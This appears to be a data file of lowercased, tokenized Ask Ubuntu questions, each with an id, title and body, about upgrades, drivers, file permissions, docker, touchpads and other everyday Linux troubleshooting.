505492	is it possible to upgrade from 12.10 to 14.04 lts version	is it possible to upgrade from ubuntu 12.10 version to 14.04 lts version , please tell me the steps thanks in advance ! ! ! !
505495	ubuntu roll up keyboard	this is about the roll up keyboard found at shop.ubuntu.com does anybody know if it 's wireless ? i have a cubox-i and i would like to know if i can just roll the keyboard in my backpack when i go to a hotel with my cubox-i and use it wirelessly . if it is wired that 's fine , but i would rather not have to use this long cord .
505502	which linux distribution to choose for creating a usb boot-repair-disk ?	boot-repair-disk is a live disc image that contains the boot-repair utility . i 'm creating a live usb with this disc image using universal usb installer . the first step is to select the linux distribution that matches the disc image . there is a drop-box containing ubuntu , fedora , etc . which linux distribution should i select ?
505503	bash script to convert multiple avi in to mp4	i have a lot of avi files in one folder and trying to convert them in to mp4 . i am using this bash script not sure whats wrong . any idea ? # ! /bin/bash for i in *.avi ; do name=`echo $ i | cut -d ' . ' -f1` ; echo $ name ; avconv -i -vcodec libx264 -acodec aac -strict experimental -threads 3 `` $ i '' `` $ name.mp4 '' ; done the error i get is : -vcodec : no such file or directory
505505	has anyone been successful running the new simcity through play on linux ?	i 've been able to download origin on play an linux but it does n't download the game ( simcity ) completely .
505506	docker . how to get bash\ssh inside runned container ( run -d ) ?	i want to ssh or bash into runned docker container . please , see example : $ sudo docker run -d webserver webserver is clean image from ubuntu:14.04 $ sudo docker ps container id image command created status ports names 665b4a1e17b6 webserver : latest /bin/bash ... ... 22/tcp , 80/tcp loving_heisenberg now i want to get something like this ( go into runned container ) : $ sudo docker run -t -i webserver ( or maybe 665b4a1e17b6 instead ) $ root @ 665b4a1e17b6 : / # however when i run the line above i get new container id $ root @ 42f1e37bd0e5 : / # previously i used vagrant so i want to get behavior similar to vagrant ssh . please , could anyone help me ?
505508	get ubuntu on another computer without internet	i want to get ubuntu on my other computer that ca n't get internet , and since it ca n't get internet , can i download it on my current ( this one ) and load it on a usb to install it on the other computer ?
505517	how do i apt-get from install source ?	i have ubuntu server installed , but missed some packages i think . i used a usb stick install . if i plug that stick back in , how can i get it setup and connected as an apt-get source ? i do n't have internet so i want to use this as the primary repo ( assuming it has various packages like make or unzip ) .
505518	removing an application created by dragging a url onto the unity bar ?	i accidentally dropped a youtube url onto the unity sidebar instead of dropping it into my text editor and it created a launch icon on the bar . i deleted this icon from the bar but now when i right click .html files ( i 'm a web developer ) , i get the option to open the file with `` game of thrones season 4 - backstage '' any ideas how i get rid of this ? thanks
505519	how to install rigs of rods from ppa	i really want to install rigs of rods on my ubuntu 14.04 ( .1 ) machine . i know that to install it there are two ways ; compiling from source or from ppa . i do n't have good luck compiling so i rather doing it from the ppa . when i tried to do it fron the ppa when i run apt-get update gives me some errors and qhen i tried apt-get install rigsofrods did n't found the package . so i tried to install it from the source , but i had problems compiling some dependences ( ogre ) . can anyone help me install it thank you p.s . : sorry for my bad english
505520	workspaces stopped working on upgrade to 14.04	i can not get workspaces to work and i am going in panic mode ! i have enabled workspaces : also , i have set the number of workspaces - ( also note the weird tweak tool window behaviour .. and that only one workspace is visible . ) i am in gnome flashback - compiz desktop env .
505522	hiding file and folders , and harddisk partition	how can we hide the file and folders with the terminal commands ? can we even hide the hard disk partitions ?
505523	how may i install the right java virtual machine ?	i receive following error in terminal : no suitable java virtual machine could be found on your system . the version of the jvm must be at least 1.5 . please define install4j_java_home to point to a suitable jvm . you can also try to delete the jvm cache file i 'm using 14.04 .
505530	macmini ubuntu desktop 14.04 headless boot , not accessible , not booting	i have a 14.04 ubuntu desktop installation on a macmini running headless in my closet . when i boot the server , it will not assign itself an ip address until i login to a user session . this means anytime i reboot , the machine is not accessible via the network until i attach a monitor and login . i am pinging the ip address of the server from my laptop on the same network and getting nothing until i login . am i missing something here ? i feel like this is an easy/obvious fix but i am missing it . thanks in advance .
505531	what version of google chrome do i have ?	how can i find out what version of chrome i am using ? i would like a command line method , not the gui - visiting chrome : //chrome in the url bar . i need to be able to use it in a bash script . i ran the command google-chrome -- help , but it did n't seem to have a -- version option .
505534	i cant transfer file to my nokia phone	is there any program equivalent to nokia pc suite for this ? ? the expansion card ( memory card ) is detected but transferring files is restricted.. help total beginner here..
505541	help for logon after update to 14.04	i install ubuntu 13.10 saucy salamander in january 14 and made update 3-4 weeks ago . by the first install in january , i did not made a password to the computer - i just typed enter . after update the system now ask for a password . i have tried the commando for forgotten password + new passwd in the root . after several tries my password is acceptet , but when i start my computer and type the password nothing happes . crtl+alt+f1 show ubuntu 14.04 lts . what can i do to log-on . can i do something in the root . by use crtl+alt+f3 or f6/f1 there is no time for typing username/password - the system say , timer : connect/disconnect timeout
505543	chromebook and want linux on a separate usb - possible ?	i want to try linux on my wife 's toshiba 13 '' chromebook . i 'd prefer not to alter anything on the chromebook itself ( as she 'll kill me if i mess it up : ) can i install and use ubunto onto a 32gb usb and then use it on the chromebook ? can the chromebook be left unaltered ie i pull out the usb and it 's back to being a chromebook ? are there special versions of ubunto that work with the touchpad , wifi and shut down of a chromebook ? do i need to alter anything in ubunto to get it working ok ( i 've heard swap space on usb is problematic ) ? would the performance be ok ? i 'll be using it for simple java dev work while i 'm on holiday ? how do i do it ? obviously it would be better if everything was installed on the ssd but i 'm currently waiting for the new i3 based chromebooks with 4gb ram and then i 'm aiming to install a 120gb ssd . mike ps i 'm familiar with unix shell and a little with linux but any admin commands tend to go over my head .
505545	purple/green/blue ring around screen ( kubuntu )	i 'm running kubuntu on my htpc on my tv ( 720p , 50 '' ) , and i have a purple or green ring around my screen at all times . it mostly is n't noticeable , but sometimes it seems really wide . any idea what this is ?
505546	absolutely hiding a file or a folder	renaming the file with adition of .filename eg `` .algosig '' is not efficient i found it visible after pressing ctrl+h . are n't there other ways which makes it invisible even after pressing ctrl + h. total hiding
505549	how do i resolve a kernel panic without reinstalling ?	i forgot to make a backup and it would take forever to reinstall and get it to a point i could use even if i were to copy over the home folder . i recently got a kernel panic with the message 'attempted to kill init ' a couple seconds after displaying the kubuntu load screen . i have an installation on another disk that i can copy over system files from , but i 'm in the dark as to what i should copy over . here is a picture :
505555	switch between two 3.5 mm audio jacks	in my desktop computer , i have two audio jacks . one of these is connected to my speakers and one to my headphones . windows allows me to set the output to use only either one of these jacks ( they appear in windows sound settings as rear audio jack and front audio jack ) . in ubuntu , i can find only one `` analog output '' which controls both the rear and the front audio jack . is there a way to control which of these outputs i want to use in ubuntu ?
505556	wireless connection is switched off when ubuntu starts	i 'm having problems with wireless in my ubuntu laptop . whenever i start this laptop , the wireless connection for all the other devices in the house ( other laptops , mobiles ... ) is switched off , including the ubuntu laptop . so , i have to reset router and stop everything i was doing in other devices ... any clue of what is going on ?
505558	new install of 14.04 lts on macbook pro ( triple boot ) wo n't boot after install	i got my macbook pro 2009 to successfully dual boot to windows 7 and yosemite . i installed mint and it would n't boot so then i tried ubuntu lts . when i boot up and select ubuntu in refind , it hangs on a purple screen , might have a purple line at the top and then it goes to a screen of white and black squirrelly lines . i 've attempted to fix it in recovery but still not able to boot .
505560	slow file transfer speed from cd	i just installed ubuntu on my dell laptop . trying to re-install some mobi and various other files to the desktop that were previously on the machine . i figured out how to right-click and move to the desktop from the cd since i could not drag and drop . however , the file transfer has already taken 45 minutes and is not even half way done . dragging and dropping the files on the machine with windows took 3 to 4 minutes . how can i improve the speed and/or drag and drop from a removable data source to the desktop ? do i need a special add-on or app ?
505563	how can i make the files created by one user readable/writable by another ?	i have a user account i created with no password to run some daemons on my server . i want my user account to be able to read , write , and delete files created by this user . how do i do this ? both users are members of the group `` users '' .
505565	mobile datacard detection problems	my 3g bsnl visiontek mobile datacard is not recognized in ubuntu 14.04 . even under internet connection menu there is no `` enable mobile broadband '' option , and also under `` edit connections '' my device is not visible or located for `` create a connection for this mobile broadband device '' . please help me to connect my device to the internet .
505568	canon mfd device scanner not working	i have a canon pixma e510 printer + scanner . i had no problem in getting the printer identified in ubuntu . but so far have n't been able to make the scanner work . when i click on sane , it says no scanner found . please reply and help me to use the scanner in ubuntu . thanking you for your earliest reply . regards , tamal
505571	flash disk not mounted in ubuntu 14.04	i am new to linux and i have installed recently ubuntu 14.04 . i have an .img file of 2gb and i want to make my flash disk bootable with this image . i used the command : dd if=xxx.img of=/dev/sdb1 after running fdisk -l which shows that my flash disk partition is /dev/sdb1 . after finishing the operation , i have the message of records in and out and 2gb are in the flash disk . the problem is after ejecting the flash and mounting it again it is no longer detected . moreover , the filesystem is changed to raw and i get the message of input/output error . the flash disk still appears in the fdisk -l. actually , i want to enter to its files and make some modifications on ěmenu.lstě could anybody help me please , i get the same result for ubuntu 13.04 and 12.04 thanks .
505572	failure to reboot after commamd line shutdown	my system is a asus 1015e ds02 laptop running ubuntu-12.04 lts desktop with upgrades , updates current , the current kernel is linux 3.2.0-67 generic . it has a 19 '' polaroid monitor/tv connected via svga cable and external keyboard and mouse ( v7/amazon basic optical mouse ) . when turned on after shutdown it fails to reboot , presenting the option to reboot with `` current kernel or current kernel with recovery '' . i choose the latter option and follow through on the next screen , `` resume '' then click ok and after message `` video may not work well finishing the reboot '' . it does recommend to reboot again after system up , if laptop/vga not on . the vga comes up ok , but the laptop does not . however today i closed the laptop and used the vga . when i reopened the laptop , it was as though it found/discovered the drivers for the laptop monitor and it came up . i am more accustomed to freebsd , which i used previously , so this is trip back to days of slackware and redhat.the one thing i sorely miss is booting to a simple black and white terminal with the knowledge that the system is up and running then launch x-window . this behaviour may more or less be involved with the update/upgrade to the current kernel , since these issues appeared to crop up after that event . i did unsuccessfully attempt to reboot the previous kernel with recovery . open for any suggestions to learn what to do to correct this issue . btw this is my only remaining computer , so like to not fiddle too much . overall i am very pleased with ubuntu , which i chose to avoid the complications involved in setting up and running servers .
505581	skype ca n't connect	after i restarted my computer to finish a upgrade , i could not log in at skype anymore . it only shows the message : skype ca n't connect . if i try web version it works . i 'm using skype 4.2 .
505583	nfs_automount not mounting readynas shares ubuntu server 14.04	hi all got nfs_automount installed on a server running ubuntu 14.04 . the problem is that automoun` wo n't mount the nfs share i have on my readynas . this is from the conf file : mountopts= '' hard , intr , tcp , actimeo=3 '' mounts= ( `` rw|readynas|/c/media/tv/|/mnt/tv/|nfs_automount_rw_testfile '' ) this is the log : nfs_automount [ 2014-08-01 19:53:51+01:00 ] : [ note ] monitoring started . nfs_automount [ 2014-08-01 19:53:51+01:00 ] : [ info ] ( dataset 1 ) remote server/nfs service at 'readynas ' available . nfs_automount [ 2014-08-01 19:53:51+01:00 ] : [ crit ] ( dataset 1 ) remote nfs share 'readynas : /c/media/tv/ ' is unmounted ; attempting mount . nfs_automount [ 2014-08-01 19:53:51+01:00 ] : [ crit ] remote share '/c/media/tv/ ' unavailable ! nfs_automount [ 2014-08-01 19:53:51+01:00 ] : [ info ] sleeping for 60 seconds . i can mount the share manually with : sudo mount -t nfs readynas : /media/tv /mnt/tv any help would be appreciated .
505587	can i use ubuntu as the operating system for my laptop ( which i would like to use as a tablet ) and also use it as a phone ?	i want to get a really small laptop which i want to take with me everywhere . i do not like microsoft and i like the idea of using ubuntu as the operating system . using headphones i would also like this computer to have the capability to call and communicate with others . is this possible ? how can it be done ?
505589	problems installing ubuntu 64 bit dual boot with windows 8.1	i have a brand new system using gigabyte b85m-d3h motherboard , 8 gigs 1600mhz memory , intel i3-4330 3.5 ghz processor , adata 128 gig ssd , wd15ears hard drive . i partioned the ssd into 90 gig and 30 gig partitions , hoping to create a dual-boot windows 8.1 pro and ubuntu 14.04 64 bit systems . when i first downloaded an ubuntu .iso , i was looking for a 64 bit intel version and chose i386 instead of amd . the 1st install went seamlessly but i realized that ubuntu was only 32 bit . i followed online discussions to remove ubuntu , create a bootable cd for ubuntu 64 bit and followed the same steps as i did the 1st time . this time however , ubuntu 64 did not recognize the windows 8.1 install and wanted to overwrite the 90gig partition . i directed it to install to the wd15ears which was previously partitioned into 2 750gig volumes . when i was finished , the system booted into ubuntu , ignoring windows 8.1 . i essentially ended up with 2 independent os systems changeable through the bios . when i went into window 8.1 and looked at the drives , a 350mb chunk of ubuntu thinks its a part of the ssd adata drive . in addition it says the wd15ears drive is locked and inaccessible . there was some grub message error saying drive locked but i am new to linix and do not know command line instructions
505590	why is there dobble sound in pulseaudio loopback module ?	i installed the pulseaudio loopback module and use it to play music from my phone to speaker 's , but it 's outputing dobble sound and it 's very quick . do anyone have an answer on that ?
505592	alternative to missing samba_backup	the packaged samba-4 install does not include the samba_backup utility that normally comes with the source code install . is it included in some other package ? is there an alternative solution that ubuntu has created ? do i just need to ignore the packaged install and compile from source ? thanks for any help .
505594	how to stop gedit ( and other programs ) from outputting gtk warnings and the like in my terminal ?	i am running awesome on trusty after having upgraded from raring . my desktop environment intentionally does not have all the gnome / freedesktop daemons runningâi do n't want them . when i execute gedit from a terminal like this : gedit file it outputs messages like this all over my terminal whenever i hit enter or save or on various other occasions : ( gedit:5700 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files i understand the meaning of this warning and i have decided that it does n't matter to me . how can i turn off this kind of warning ? with `` turn off '' , i do n't mean any of these or similar workarounds : piping the output of gedit into /dev/null writing a wrapper script that pipes the output of gedit into /dev/null creating an alias that pipes the output of gedit into /dev/null these workarounds are not acceptable as they have to be applied individually to each gnome applicationâgedit is not the only one who likes to mess up the terminal .
505596	wireless card laptop	the wifi card in my compaq presario laptop does n't register in ubuntu 14.04 lts . i have tried connecting it through different wireless networks and still does n't connect . using an ethernet cable works but it needs to be wireless .
505602	i have xubuntu 14.04 . ca n't delete a `` phantom '' file from my home folder	i tried to create a file in my home folder by right-clicking in the folder and selecting `` create document '' , then `` empty file '' . when the window came up to name the new file , which already had `` new empty file '' in the window , i replaced that with a different name , .gtkrc-2.0 , and clicked on `` create . '' then nothing happened ; no new file appeared in the home folder . i figured i had done it wrong , so i tried it differently ; that is , by just letting the name `` new empty file '' be and then click on `` create . '' a new file with that name does appear in the folder , but when i try to rename it .gtkrc-2.0 , i get the message that the file ca n't be renamed because .gtkrc-2.0 already exists . so somehow the system has been fooled into thinking that the file already exists even though it does n't it appear in the folder , nor can it be located with `` find file . '' it 's a phantom file . can anyone help me get rid if it ?
505604	ubuntu 13.04 unable to locate package package-name	i was using ubuntu 12.04 . but today i just made format my system and installed ubuntu 13.04 . i have made copied the archive file ( /var/cache/apt/archives ) from ubuntu 12.04 and made paste to 13.04 . after i made the system update by doing commands ( sudo apt-get update ) terminal . then after that whatever i am trying to install on my system it is showing error like reading package lists ... done building dependency tree reading state information ... done e : unable to locate package package-name even i tried to install apache server by using sudo apt-get apache2 . it is showing the error like reading package lists ... done building dependency tree reading state information ... done e : unable to locate package apache2 so can someone kindly tell me how to solve this issue . any help and suggestions will be really appreciable . thanks
505606	how to install zend framework 2 on ubuntu ?	i 'm looking for a tutorial on how to install zendframework 2 on ubuntu 14.04 , and also a tutorial teaching how to use zendframework 2 . could someone help me ? if it is useful to know , i 'm with xampp for linux 1.8.3-4 , apache/2.4.7 , and mysql 5.6.16
505612	new xubuntu 14.04 installation : the volume keys on my laptop keyboard do n't work any more	since i installed xubuntu 14.04 on my laptop ( lenovo ) , the volume up , down , and mute keys on my keyboard do n't work . i checked the answers given to questions similar to mine and tried the suggested solutions . these solutions did work for the folks who asked the questions , but they did n't work in my case . here they are : first suggested solution : enter the following in terminal : gsettings reset org.gnome.settings-daemon.plugins.media-keys volume-up gsettings reset org.gnome.settings-daemon.plugins.media-keys volume-down gsettings reset org.gnome.settings-daemon.plugins.media-keys volume-mute second suggested solution : enter the following in terminal : dconf reset -f /org/gnome/settings-daemon/plugins/media-keys/ can anyone suggest a different solution ? thanks much , bob
505614	ca n't see 14.04 server virtualbox guest from os x host	i have ubuntu 14.04 server installed on a virtual machine with virtualbox . i 've enabled host-only networking in the vm 's settings . when i do ifconfig | grep addr i get an inet addr : 192.168.56.101 . i went through the steps in this post : how can i access apache ( on virtualbox guest ) from host ? but it 's simply not working . when i ping the server , all i get are packet timeouts . i 'm trying to make my host and guest talk to each other so that i can test some networking code . any ideas ?
505617	lost permission to download into anything but /home	not sure what caused it but one day i could n't download any files into my download directory where the error was `` insufficient permissions '' . i tried other locations /documents /desktop but i did n't have permission for those either . i can only download into /home . i thought this might be google chrome specific but i tried in firefox and also with transmission but every time it fails . i 'm running 64 bit , 14.04 on amd fx ( tm ) -8320 dual boot with windows 8 . how can i get permission to download files anywhere but my home directory ? thanks and sorry for the noob question output of ls -l drwxr-xr-x 3 www-data www-data 4096 jul 11 18:13 desktop drwxr-xr-x 4 www-data www-data 4096 jul 14 18:43 documents drwxr-xr-x 5 www-data www-data 4096 jul 10 13:29 downloads -rw-r -- r -- 1 www-data www-data 8980 jun 26 19:39 examples.desktop drwxr-xr-x 450 www-data www-data 20480 jul 8 19:03 music drwxr-xr-x 2 www-data www-data 4096 jun 26 19:53 pictures drwxr-xr-x 2 www-data www-data 4096 jun 26 19:53 public drwxrwxr-x 5 www-data www-data 4096 jul 1 00:58 sketchbook drwxr-xr-x 2 www-data www-data 4096 jun 26 19:53 templates drwxr-xr-x 2 www-data www-data 4096 jun 26 19:53 videos and output of ls -l / total 100 drwxr-xr-x 2 root root 4096 jul 24 09:56 bin drwxr-xr-x 4 root root 4096 jul 23 14:17 boot drwxr-xr-x 4 root root 4096 jun 26 20:50 boot-sav drwxrwxr-x 2 root root 4096 jun 26 19:39 cdrom drwxr-xr-x 17 root root 4360 aug 1 09:04 dev drwxr-xr-x 145 root root 12288 aug 1 12:58 etc drwxr-xr-x 3 root root 4096 jun 26 19:39 home lrwxrwxrwx 1 root root 33 jul 17 20:23 initrd.img - > boot/initrd.img-3.13.0-32-generic lrwxrwxrwx 1 root root 33 jun 26 19:41 initrd.img.old - > boot/initrd.img-3.13.0-24-generic drwxr-xr-x 23 root root 4096 jun 26 19:42 lib drwxr-xr-x 2 root root 4096 apr 16 21:21 lib64 drwx -- -- -- 2 root root 16384 jun 26 19:29 lost+found drwxr-xr-x 3 root root 4096 jun 26 19:53 media drwxr-xr-x 3 root root 4096 jun 26 20:50 mnt drwxr-xr-x 4 root root 4096 jul 1 00:52 opt dr-xr-xr-x 257 root root 0 aug 1 05:04 proc drwx -- -- -- 8 root root 4096 jul 14 18:02 root drwxr-xr-x 25 root root 820 aug 1 12:39 run drwxr-xr-x 2 root root 12288 jul 24 09:56 sbin drwxr-xr-x 2 root root 4096 apr 16 21:21 srv dr-xr-xr-x 13 root root 0 aug 1 05:04 sys drwxrwxrwt 8 root root 4096 aug 1 17:17 tmp drwxr-xr-x 10 root root 4096 apr 16 21:21 usr drwxr-xr-x 14 root root 4096 jul 11 18:17 var lrwxrwxrwx 1 root root 30 jul 17 20:23 vmlinuz - > boot/vmlinuz-3.13.0-32-generic lrwxrwxrwx 1 root root 30 jun 26 19:41 vmlinuz.old - > boot/vmlinuz-3.13.0-24-generic
505622	is there a way to push an os install remotely ?	i would like to be able to push an ubuntu install ( most likely 12.04 ) to an old imac 5,1 2006 , osx 10.58 ( leopard , not snow leopard ) . i am wondering if it is possible to do this entirely from a separate ( ubuntu ) machine ( one computer to another versus setting up multiple servers ) . i also would like to keep my current os if possible . luckily i can use some cross platform terminal commands . the problems i see arising would be the efi , drivers , and system restarts , as the main things to overcome if i want to do this , but i would like to know if it is even possible , and what tools i would need , or steps to take .
505627	how do i get the sd card slot to work on my dell latitude 2120 ?	the sd card reader on my dell latitude 2120 , running ubuntu 14.04 , does nothing when i insert an sd card into it . i unsuccessfully looked for a solution online , and apparently the drivers for the realtek rts5208 sd card reader that the latitude uses are n't included by default in ubuntu . i found a driver for the card reader ( on this page ) for ubuntu 10.10 ( change the os in the drop-down menu to ubuntu 10.10 , then look under `` drivers for os deployment '' to get to the driver . ) however , , when i try to install the .deb package that is inside of the downloaded .tar.gz package , it fails to install . this is the output i get from trying to install it with sudo dpkg -i realtek-rts-pstor-pcie-media-card-reader-dkms_1.10.10_all.deb : ( reading database ... 254964 files and directories currently installed . ) preparing to unpack realtek-rts-pstor-pcie-media-card-reader-dkms_1.10.10_all.deb ... -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 1.10.10 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . unpacking realtek-rts-pstor-pcie-media-card-reader-dkms ( 1.10.10 ) over ( 1.10.10 ) ... setting up realtek-rts-pstor-pcie-media-card-reader-dkms ( 1.10.10 ) ... loading new realtek-rts-pstor-pcie-media-card-reader-1.10.10 dkms files ... first installation : checking all kernels ... building only for 3.13.0-32-generic building for architecture i686 building initial module for 3.13.0-32-generic error ! bad return status for module build on kernel : 3.13.0-32-generic ( i686 ) consult /var/lib/dkms/realtek-rts-pstor-pcie-media-card-reader/1.10.10/build/make.log for more information . how do i get the card reader to work ?
505629	background text	when i 'm switching application using alt+tab i see strange background text on the files icon . does anybody saw the same behaviour ? see image here http : //i.stack.imgur.com/nkhgl.jpg system : ubuntu 14.04 64
505630	i can no longer see my windows share drives in 12.04 lts	i am running 12.04 lts . i installed the latest update today and now i can no longer access my network drive or my windows 7 drives . everything was fine until i installed the update . any help will be appreciated .
505631	gnome-control-center ca n't be accessed by unity search , sound devices not recognized	i do n't know what happened , but after a recent update i can no longer find system settings via unity 's search button on the dash ; i have to manually open it from the command line . my system no longer is able to recognize my headphone adapter , either . any idea what might have happened ? ubuntu is getting notorious in my department for being flaky as of late -- this is definitely adding to the list of complaints .
505633	alps touchpad detected as ps/2 , corrected with psmouse-dkms-alpsv7 but reset after reboot	hope someone can help me a little with this problem . i have a lenovo ideapad z510 , with a alps touchpad . and os = kubuntu 14.04 ( windows 8.1 alongside with it ) the touchpad is detected as an ps/2 mouse . using this guide http : //askubuntu.com/a/417518/262262 , and some minor edits , managed i to get it to work , and multitouch is working as it should . but after reboot , all settings went back , as it was before the psmouse-dkms-alpsv7 modification . is it possible to make the changes permanent ? before changes : the touchpad is detected as an ps/2 mouse : chp @ chp-lenovo-ideapad-z510-kubuntu : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=13 [ slave pointer ( 2 ) ] ⎜ ↳ logitech unifying device . wireless pid:4027 id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ lenovo easycamera id=10 [ slave keyboard ( 3 ) ] ↳ ideapad extra buttons id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] dmesg writes : chp @ chp-lenovo-ideapad-z510-kubuntu : ~ $ dmesg | grep -i alps [ 1.457466 ] psmouse serio1 : alps : unknown alps touchpad : e7=73 03 0a , ec=88 b6 06 the changes : i started to follow the guide ( http : //askubuntu.com/a/417518/262262 ) , but every time i restartet the pc , the git folder was deleted . so i moved it to /msp instead . ( chmod 777 ) file = install.sh # ! /bin/bash # changed from : # ! /bin/bash # old line : mdir= '' /usr/lib/modules/ $ ( uname -r ) '' mdir= '' /lib/modules/ $ ( uname -r ) '' # old line : newmdir= '' $ mdir/ $ { dest_module_location [ 0 ] } '' newmdir= '' $ mdir $ { dest_module_location [ 0 ] } '' file = dkms.conf # old line : dest_module_location [ 0 ] = '' /updates '' dest_module_location [ 0 ] = '' /updates/dkms '' and then installed it . the modifications in the above files , prevented errors under install . results : chp @ chp-lenovo-ideapad-z510-kubuntu : /psm/psmouse-dkms-alpsv7 $ sudo ./install.sh [ sudo ] password for chp : ────── building with dkms ─────── error ! dkms tree already contains : psmouse-dkms-alpsv7-1.0 you can not add the same module/version combo more than once . module psmouse-dkms-alpsv7/1.0 already built for kernel 3.13.0-32-generic/4 ** old module backed up as : '/lib/modules/3.13.0-32-generic/kernel/drivers/input/mouse/psmouse.ko.orig' ────── installing with dkms ─────── module psmouse-dkms-alpsv7/1.0 already installed on kernel 3.13.0-32-generic/x86_64 install succeded : '/lib/modules/3.13.0-32-generic/updates/dkms/psmouse.ko ' found and copied to : '/lib/modules/3.13.0-32-generic/kernel/drivers/input/mouse/psmouse.ko' ──→ rmmod psmouse ──→ modprobe psmouse ok. xinput : chp @ chp-lenovo-ideapad-z510-kubuntu : /psm/psmouse-dkms-alpsv7 $ xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech unifying device . wireless pid:4027 id=14 [ slave pointer ( 2 ) ] ⎜ ↳ alps ps/2 device id=13 [ slave pointer ( 2 ) ] ⎜ ↳ alpsps/2 alps glidepoint id=15 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ lenovo easycamera id=10 [ slave keyboard ( 3 ) ] ↳ ideapad extra buttons id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] dmesg : chp @ chp-lenovo-ideapad-z510-kubuntu : /psm/psmouse-dkms-alpsv7 $ dmesg | grep -i alps [ 1.457466 ] psmouse serio1 : alps : unknown alps touchpad : e7=73 03 0a , ec=88 b6 06 [ 2072.514926 ] input : alps ps/2 device as /devices/platform/i8042/serio1/input/input18 [ 2072.536678 ] input : alpsps/2 alps glidepoint as /devices/platform/i8042/serio1/input/input17 synclient : chp @ chp-lenovo-ideapad-z510-kubuntu : /psm/psmouse-dkms-alpsv7 $ synclient -l parameter settings : leftedge = 614 rightedge = 3481 topedge = 307 bottomedge = 1740 fingerlow = 12 fingerhigh = 15 maxtaptime = 180 maxtapmove = 201 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 emulatemidbuttontime = 75 emulatetwofingerminz = 141 emulatetwofingerminw = 7 vertscrolldelta = 91 horizscrolldelta = 91 vertedgescroll = 1 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 0 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0436872 touchpadoff = 0 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 1 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 10 palmminz = 100 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 15 pressuremotionmaxz = 80 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 22 verthysteresis = 22 clickpad = 0
505635	suspend from keyboard at lock screen	i have a logitech dinovo edge wireless keyboard with a suspend button . this button does work properly most of the time when the screen is unlocked on the last few ubuntu versions ( included 14.04 ) . however , occasionally suspend fails but the screen comes back locked or someone accidentally wakes up the computer . at this point , i often do not even have the monitor on . i would like to be able to just press the suspend button to put it to sleep again . note that the suspend option is already available from the lock screen via mouse/menu and i 've read about security trade-offs .
505638	new skype will not install in lucid due to dependency on libqt4-network 4:4.8.0	today i was not able to log into skype in lucid as the newest version of skype is now required . running the deb package gives a dependency error that libqt4-network 4:4.8.0 is required . lucid ( ubuntu 10.04 ) doesnt have that version . can i install that version of the qt lib from a newer version of ubuntu ? how ?
505640	save files and applications to a live ubuntu disk	i was wondering is itpossible and how could one save a document or/and application onto a live ubuntu usb ? i am on macbook air running os x 10.8.5 i installed ubuntu onto my usb using unetbootin . thank you in advance !
505644	how to make new files owned by a group ?	ubuntu 14.04 server x64 i have an ext4 partition named media that is mounted via fstab and shared via samba . i have two users , ajb ( created when i installed ) and deluge ( no password , runs deluge daemon and others ) . both ajb and deluge are members of the group users . when i have the mount point owned by ajb and users , i can access the shares and it 's fine . however , when the deluge daemon puts files into the partition , they ca n't be accessed through samba or when i ssh in as ajb . the are owned solely by deluge . how can i make the new files in this partition automatically owned by the group 'users ' ?
505649	could not open location 'network : // '	i am using ubuntu 12.04 lts . i am getting the following error when i click on network : could not open location 'network : //' dbus error org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken .
